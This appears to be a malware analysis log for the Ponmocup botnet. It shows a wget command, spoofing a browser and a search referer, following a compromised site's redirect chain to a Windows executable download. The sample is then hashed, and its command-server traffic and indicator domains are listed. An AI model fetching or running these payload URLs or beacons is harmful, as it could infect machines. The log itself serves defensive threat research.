For general info about the Ponmocup malware / botnet please see:
http://www9.dyndns-server.com:8080/pub/botnet-links.html

user@host:~$ wget -S -v --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)" --referer="http://www.google.ch/search?hl=de&source=hp&biw=1259&bih=878&q=zucchero&oq=Zucchero&aq=0&aqi=g10&aql=&gs_sm=e&gs_upl=765l1858l0l5090l8l7l0l1l1l0l312l936l0.1.2.1l4" http://www.zucchero.it/ -O www.zucchero.it
--2011-07-21 10:03:27--  http://www.zucchero.it/
Resolving www.zucchero.it... 62.149.229.247
Connecting to www.zucchero.it|62.149.229.247|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 302 Found
  Date: Thu, 21 Jul 2011 07:04:21 GMT
  Server: Apache/2.2.3 (CentOS)
  Set-Cookie: xccgtswgokoe=1; path=/; domain=www.zucchero.it; expires=Thu, 28-Jul-2011 07:04:21 GMT
  Location: http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=34870508&j=332&m=19b540f2afd8451f302e34672bf8529d&h=www.zucchero.it&u=/&q=&t=20110721090421
  Content-Length: 435
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
Location: http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=34870508&j=332&m=19b540f2afd8451f302e34672bf8529d&h=www.zucchero.it&u=/&q=&t=20110721090421 [following]
--2011-07-21 10:03:27--  http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=34870508&j=332&m=19b540f2afd8451f302e34672bf8529d&h=www.zucchero.it&u=/&q=&t=20110721090421
Resolving thousandmilitary.com... 77.79.11.98
Connecting to thousandmilitary.com|77.79.11.98|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 302 Moved Temporarily
  Server: Apache/1.3.42
  Date: Thu, 21 Jul 2011 08:04:21 GMT
  Connection: close
  Location: http://press7.therealityglove.com/se/3da19bea8f9c07b830cf18c78f96e5a0837015a0ab1369c39fd839c8e12c24202a98e7208b0cf3c131be558a742eb17f4a193ca6f463244bdad2e6bedadba63cdb1ca9/9bb8ed62/zucchero.com
Location: http://press7.therealityglove.com/se/3da19bea8f9c07b830cf18c78f96e5a0837015a0ab1369c39fd839c8e12c24202a98e7208b0cf3c131be558a742eb17f4a193ca6f463244bdad2e6bedadba63cdb1ca9/9bb8ed62/zucchero.com [following]
--2011-07-21 10:03:28--  http://press7.therealityglove.com/se/3da19bea8f9c07b830cf18c78f96e5a0837015a0ab1369c39fd839c8e12c24202a98e7208b0cf3c131be558a742eb17f4a193ca6f463244bdad2e6bedadba63cdb1ca9/9bb8ed62/zucchero.com
Resolving press7.therealityglove.com... 95.168.177.142
Connecting to press7.therealityglove.com|95.168.177.142|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Server: Apache/1.3.42
  Date: Thu, 21 Jul 2011 08:03:29 GMT
  Content-Type: application/x-msdownload
  Connection: close
  Expires: Mon, 26 Jul 1997 05:00:00 GMT
  Cache-Control: must-revalidate, post-check=0, pre-check=0
  Cache-Control: private
  Content-Disposition: attachment; filename="zucchero.com"
  Content-Length: 208911
  Content-Transfer-Encoding: binary
  Accept-Ranges: none
Length: 208911 (204K) [application/x-msdownload]
Saving to: "www.zucchero.it"

100%[====================================================================================================================>] 208,911      930K/s   in 0.2s

2011-07-21 10:03:28 (930 KB/s) - "www.zucchero.it" saved [208911/208911]

user@host:~$ mv www.zucchero.it zucchero.com
user@host:~$ ls -l zucchero.com
-rw-r--r-- 1 user group 208911 Jul 21 10:03 zucchero.com
user@host:~$ file zucchero.com
zucchero.com: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
user@host:~$ md5sum zucchero.com
1098b041b743fa06e276eca074042b3d  zucchero.com

http://www.threatexpert.com/report.aspx?md5=1098b041b743fa06e276eca074042b3d
http://anubis.iseclab.org/?action=result&task_id=136d303b3e42c1ba49d4968a9aaf6b177

From ANUBIS:1028 to 78.159.100.32:80 - [surfacechicago.net]
Request: GET /html/license_43EC922A3D0E1F403834ED406BA80F5A686E606DF596C71B1F47B22D93555C332C0C0719D7D5C142B8C2C3E65DCC50966E34BA8C4D56463B02F3FED9544A9D2924CF3F64589D6F1B3DBB7180E9738A11F3A7C664F6BC84AA1B5B4824A007F3FD85586DDE35D8DFD83C52EF01BB4FC51EFA610EB05E9F31AACE0A4CE3F93DAE4758E93775E2175873776B41C6B8B8E477551AC5DF821A2A30780101FAF813B0E0A5703F759B3C706981FD4A7869895157E39ED3AA844149D42318C1889EA4154625D988CD8E00FAE64FB6CD1A8B4980B2FDAA3A963707F0454AB9697C1861AC5B1A8A5B80C9A8349D67AA22D35E7D97A419B642773926FB9F0382AAFF9F800397340CD84A677BC8EBC7EB45D3F0981BF368EFFEE0FB69DCF5A74CC14D87B121909C9E0DC4C3931749D5EAFA2C4ED7B092B243D8B108A71EE3DEF4B8746CEB6E206AEFD02B3C597CD47922E8F6E838683FCEA3913E9AF0A2E60E16EB19488945AC32C1A70FC9D35E2118BD8AC58E48758F02155C623F2C41B97F46F5268E.html
Response: 404 "Not Found"

From ANUBIS:1029 to 78.159.100.32:80 - [surfacechicago.net]
Request: GET /html/license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html
Response: 404 "Not Found"

thousandmilitary.com 77.79.11.98
press7.therealityglove.com 95.168.177.142
surfacechicago.net 78.159.100.32